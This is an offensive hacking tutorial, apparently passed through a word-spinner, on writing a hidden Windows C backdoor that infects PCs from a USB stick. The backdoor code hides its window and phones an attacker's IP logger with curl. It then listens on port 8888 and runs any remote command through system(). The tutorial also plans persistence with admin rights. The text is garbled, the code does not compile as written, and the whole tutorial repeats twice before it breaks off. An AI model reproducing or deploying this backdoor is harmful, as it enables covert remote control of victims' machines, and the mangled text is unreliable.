How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds) - By Paid Hackers
I) INTRODUCTION
What's an backdoor ?
Essentially, an backdoor is any project that permits you to get a remote access on your target. So it can be anything, from an essential php shell to an APT.
What's an APT ?
Adept stands for "Advanced Persistent Threat". We can see three levels of dangers :
1) Basic danger like raw msfpayloads (script-kiddies level)
2) Basic developers ( for instance utilizing fundamental msfpayloads, and a "real program", with a code Template)
3) APT which is the most Advanced level.
What are we gonna do ?
We'll program a decent C backdoor. So we are between level 2 and 3. You'll need to infuse it yourself in a true blue program, or code a "real looking system".
II) GENERAL IDEA
What do we need ?
We Want a shell on a removed machine, so we can utilize it to... We can utilize it.
We likewise need it PERSISTENT.
We'll likewise need to enhance it.
Goodness, and we additionally need to backdoor any PC just by stopping a USB stick and tapping on our installer, this must take under 3 seconds
The most effective method to do it ?
C dialect permits you to convey over the Internet, or with nearby applications utilizing "Attachments". These attachments can be tie to a predefined port and be utilized for different ways :
Sending fashioned bundles ( port scanner, dos tool...)
Sniffing traffc (sniffers)
Customer/Servers applications
So how to utilize attachments to program an backdoor ?
Well an backdoor is a Client or a Server.
Tie shell backdoores are servers : they tie to a nearby port and sit tight for approaching associations to give a shell
Opposite shell backdoores are customers : they join with a predetermined IP to give a shell.
Opposite shells are broadly utilizes as they're less "suspicious".
Be that as it may, when you utilize reverse backdoorrs, you have to determine YOUR IP. Disagreeable right ? Until you've got hacked servers or open IP, this will lead any tracker to your home.
That is the reason, we'll program a tie shell secondary passage. In this way, in the event that you ensure your IP, you'll be less jeopardized.
Yet, How to join with our backdoor on the off chance that we don't realize what is its IP ? On the other hand in the event that its IP change ? That is the reason we'll additionally utilize a little hack to get the exploited person IP.
So its kinda, "hey now i've got your adress : Knock !!
Make it industrious ?
You've got parcel of alternatives, however I'll keep it basic. Loads of projects that auto-execute at startup add a section to the Windows Registry.
In any case, this is not adequate. We need ADMIN RIGHTS. So will utilize "schtasks" with a xml document to make an undertaking at startup that will autp-dispatch our secondary passage with administrator rights.
Get Victims IP ?
Truly straightforward. Our undertaking will incorporate the CURL paired in its repertory. Our code will dispatch CURL keeping in mind the end goal to interface with a removed server : An ip logging administration or a server you have.
This is a duplicate glue :
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")/Winsock Library
int main(int argc, roast *argv)
{
hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_MINIMIZE);/won't conceal the window without SW_MINIMIZE
ShowWindow(hWnd, SW_HIDE);/ Hide Window
system("curl.exe http://URL_TOYOUR__IPLOGGER ");
secondary passage();
return 0;
}
int secondary passage()
{
/ Initializing vars
WSADATA wsa;
Attachment s, new_socket;
struct sockaddr_in server, customer;
int c;
roast *message, server_reply100000;
int recv_size;
printf("\nInitialising Winsock...");
on the off chance that (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("Failed. Slip Code : %d", WSAGetLastError());
return 1;
}
printf("Initialised.\n");
/Create an attachment
on the off chance that ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Could not make attachment : %d", WSAGetLastError());
}
printf("Socket created.\n");
/Prepare the sockaddrin structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(8888);/PORT 8888 change it on the off chance that you need
/Bind
on the off chance that (bind(s, (struct sockaddr )&server, sizeof(server)) == SOCKET_ERROR)
{
printf("Bind fizzled with slip code : %d", WSAGetLastError());
exit(EXIT_FAILURE);
}
puts("Bind done");
/Listen to approaching associations
listen(s, 3);
/Accept and approaching association
puts("Waiting for approaching connections...");
c = sizeof(struct sockaddr_in);
Record *fp2;
burn ch;
int i = 0;
int clean_array = 0;
burn array[10000]
burn concat[11] = " > cmd.txt";
burn error_message[100] = "\n !!! WRONG COMMAND !!!" ;
burn chdir_message[100 ]= "\n Chdir to : ";
burn chdir_success[100] = "\n Chdir achievement !\n";
int ret;
int chdir_flag;
while ((new_socket = accept(s, (struct sockaddr )&client, &c)) != INVALID_SOCKET)
{
puts("Connection acknowledged");
int a = 1;
while (a == 1)
{
on the off chance that ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
else
{
printf("recv size : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
chdir_flag = strcmp(server_reply, "chdir");
printf(">>> %d <<<\n", chdir_flag);
in the event that (chdirflag == 0)
{
in the event that (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
{
puts("Send fizzled");
return 1;
}
in the event that ((recvsize = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
printf("CHDIR : %d\n", recv_size);
server_reply[recv_size ]= '\0';
printf("INPUT : %s\n", server_reply);
chdir(server_reply);
printf("Chdir DONE !!!\n");
chdir_flag = 1;
in the event that (send(newsocket, chdir_success, strlen(chdir_success), 0) < 0)
{
puts("Send fizzled");
return 1;
}
}
else
{
printf("Command yield >>\n");
ret = system(server_reply);
printf("\n\n>>> %d <<<\n\n", ret);
i = 0;
in the event that (ret == 0)
{
fp2 = fopen("cmd.txt", "r");
while ((ch = fgetc(fp2)) != EOF)
{
printf("%c", ch);
arrayi = ch;
i++;
}
arrayi = '\0';
remove(fp2);
fclose(fp2);
in the event that (send(newsocket, show, strlen(array), 0) < 0)
{
puts("Send fizzled");
return 1;
}
for (i = 0; i < 10000; i++)
array[i] = '\0';
}
in the event that (ret == 1)
send(new_socket, error_message, strlen(error_message), 0);
}
}
}
in the event that (newsocket == INVALID_SOCKET)
{
printf("accept fizzled with mistake code : %d", WSAGetLastError());
return 1;
}
}
closesocket(s);
WSACleanup();
return 0;
}
END !
This is the servers/Backdoor code.
IV) INSTALL IT AND ADD SOME FUN
To begin with recovery, your past program as "server.exe" for instance.
At that point we'll utilize the following C code (to be executed with ADMIN RIGHTS)
What's an backdoor ?
Essentially, an backdoor is any project that permits you to get a remote access on your target. So it can be anything, from an essential php shell to an APT.
What's an APT ?
Adept stands for "Advanced Persistent Threat". We can see three levels of dangers :
1) Basic danger like raw msfpayloads (script-kiddies level)
2) Basic developers ( for instance utilizing fundamental msfpayloads, and a "real program", with a code Template)
3) APT which is the most Advanced level.
What are we gonna do ?
We'll program a decent C backdoor. So we are between level 2 and 3. You'll need to infuse it yourself in a true blue program, or code a "real looking system".
II) GENERAL IDEA
What do we need ?
We Want a shell on a removed machine, so we can utilize it to... We can utilize it.
We likewise need it PERSISTENT.
We'll likewise need to enhance it.
Goodness, and we additionally need to backdoor any PC just by stopping a USB stick and tapping on our installer, this must take under 3 seconds
The most effective method to do it ?
C dialect permits you to convey over the Internet, or with nearby applications utilizing "Attachments". These attachments can be tie to a predefined port and be utilized for different ways :
Sending fashioned bundles ( port scanner, dos tool...)
Sniffing traffc (sniffers)
Customer/Servers applications
So how to utilize attachments to program an backdoor ?
Well an backdoor is a Client or a Server.
Tie shell backdoores are servers : they tie to a nearby port and sit tight for approaching associations to give a shell
Opposite shell backdoores are customers : they join with a predetermined IP to give a shell.
Opposite shells are broadly utilizes as they're less "suspicious".
Be that as it may, when you utilize reverse backdoorrs, you have to determine YOUR IP. Disagreeable right ? Until you've got hacked servers or open IP, this will lead any tracker to your home.
That is the reason, we'll program a tie shell secondary passage. In this way, in the event that you ensure your IP, you'll be less jeopardized.
Yet, How to join with our backdoor on the off chance that we don't realize what is its IP ? On the other hand in the event that its IP change ? That is the reason we'll additionally utilize a little hack to get the exploited person IP.
So its kinda, "hey now i've got your adress : Knock !!
Make it industrious ?
You've got parcel of alternatives, however I'll keep it basic. Loads of projects that auto-execute at startup add a section to the Windows Registry.
In any case, this is not adequate. We need ADMIN RIGHTS. So will utilize "schtasks" with a xml document to make an undertaking at startup that will autp-dispatch our secondary passage with administrator rights.
Get Victims IP ?
Truly straightforward. Our undertaking will incorporate the CURL paired in its repertory. Our code will dispatch CURL keeping in mind the end goal to interface with a removed server : An ip logging administration or a server you have.
This is a duplicate glue :
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")/Winsock Library
int main(int argc, roast *argv)
{
hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_MINIMIZE);/won't conceal the window without SW_MINIMIZE
ShowWindow(hWnd, SW_HIDE);/ Hide Window
system("curl.exe http://URL_TOYOUR__IPLOGGER ");
secondary passage();
return 0;
}
int secondary passage()
{
/ Initializing vars
WSADATA wsa;
Attachment s, new_socket;
struct sockaddr_in server, customer;
int c;
roast *message, server_reply100000;
int recv_size;
printf("\nInitialising Winsock...");
on the off chance that (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("Failed. Slip Code : %d", WSAGetLastError());
return 1;
}
printf("Initialised.\n");
/Create an attachment
on the off chance that ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Could not make attachment : %d", WSAGetLastError());
}
printf("Socket created.\n");
/Prepare the sockaddrin structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(8888);/PORT 8888 change it on the off chance that you need
/Bind
on the off chance that (bind(s, (struct sockaddr )&server, sizeof(server)) == SOCKET_ERROR)
{
printf("Bind fizzled with slip code : %d", WSAGetLastError());
exit(EXIT_FAILURE);
}
puts("Bind done");
/Listen to approaching associations
listen(s, 3);
/Accept and approaching association
puts("Waiting for approaching connections...");
c = sizeof(struct sockaddr_in);
Record *fp2;
burn ch;
int i = 0;
int clean_array = 0;
burn array[10000]
burn concat[11] = " > cmd.txt";
burn error_message[100] = "\n !!! WRONG COMMAND !!!" ;
burn chdir_message[100 ]= "\n Chdir to : ";
burn chdir_success[100] = "\n Chdir achievement !\n";
int ret;
int chdir_flag;
while ((new_socket = accept(s, (struct sockaddr )&client, &c)) != INVALID_SOCKET)
{
puts("Connection acknowledged");
int a = 1;
while (a == 1)
{
on the off chance that ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
else
{
printf("recv size : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
chdir_flag = strcmp(server_reply, "chdir");
printf(">>> %d <<<\n", chdir_flag);
in the event that (chdirflag == 0)
{
in the event that (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
{
puts("Send fizzled");
return 1;
}
in the event that ((recvsize = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
printf("CHDIR : %d\n", recv_size);
server_reply[recv_size ]= '\0';
printf("INPUT : %s\n", server_reply);
chdir(server_reply);
printf("Chdir DONE !!!\n");
chdir_flag = 1;
in the event that (send(newsocket, chdir_success, strlen(chdir_success), 0) < 0)
{
puts("Send fizzled");
return 1;
}
}
else
{
printf("Command yield >>\n");
ret = system(server_reply);
printf("\n\n>>> %d <<<\n\n", ret);
i = 0;
in the event that (ret == 0)
{
fp2 = fopen("cmd.txt", "r");
while ((ch = fgetc(fp2)) != EOF)
{
printf("%c", ch);
arrayi = ch;
i++;
}
arrayi = '\0';
remove(fp2);
fclose(fp2);
in the event that (send(newsocket, show, strlen(array), 0) < 0)
{
puts("Send fizzled");
return 1;
}
for (i = 0; i < 10000; i++)
array[i] = '\0';
}
in the event that (ret == 1)
send(new_socket, error_message, strlen(error_message), 0);
}
}
}
in the event that (newsocket == INVALID_SOCKET)
{
printf("accept fizzled with mistake code : %d", WSAGetLastError());
return 1;
}
}
closesocket(s);
WSACleanup();
return 0;
}
END !
This is the servers/Backdoor code.
IV) INSTALL IT AND ADD SOME FUN
To begin with recovery, your past program as "server.exe" for instance.
At that point we'll utilize the following C code (to be executed with ADMIN RIGHTS)